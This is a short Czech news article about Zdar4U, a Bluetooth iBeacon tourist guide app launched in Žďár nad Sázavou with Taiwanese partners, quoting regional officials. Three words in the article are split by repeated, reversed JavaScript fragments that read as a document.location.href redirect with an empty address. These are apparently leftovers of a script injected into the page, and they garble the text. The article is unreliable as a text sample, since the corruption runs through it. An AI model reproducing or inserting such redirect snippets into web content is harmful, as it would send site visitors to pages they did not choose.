Rainbow page separator

Nejenom památku UNESCO přibližuje aplikace z Tchaj-wanu

Pátek, 2. června 2017

Nové zvony se ze Zelené hory naplno rozezní o srpnové pouti

Žďár nad Sázavou / Nový informační systém Zdar4U po půlročním ověřování spustili ve Žďáře. Jedná se o zatím jinde v českém turismu nevyuži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou službu předávání informací prostřednictvím iBeacon vysílačů. Podobnou technickou pomůcku využívá například Národní palácové muzeum v Taipei na Tchaj-wanu. V České republice výhody principu nabídnutého tchajwanskými partnery Kraji Vysočina vyzkouší na dvaceti místech právě ve Žďáře. „Průvodce funguje po stažení nové aplikace při zapnutém blue[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tooth. Už při instalaci se do telefonu stahuje obsah vybraných lokalit, ve chvíli, kdy se telefon přiblíží k vysílači, navzájem se spojí a telefon zahlásí aktualitu a zobrazí obsah ve vybraném jazyce. V tu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to chvíli je v nabídce šest jazykových mutací,“ informoval náměstek hejtmana Kraje Vysočina Vladimír Novotný. Kraj coby provozovatel systému bude rok sledovat statistiky užití služby a vyhodnocovat reakce uživatelů.

„Mezi dvacítkou vybraných turistických cílů v nabídce aplikace figuruje například zámek, poutní kostel svatého Jana Nepomuckého na Zelené hoře a naučné stezky v okolí,“ přiblížila Jana Fischerová, náměstkyně hejtmana pro oblast kultury a památkové péče. Průvodce pro mobilní telefony Zdar4U je projektem Kraje Vysočina, města a Institutu pro informační průmysl Tchaj-wan. Spolufinancovalo ho tchajwanské ministerstvo zahraničí.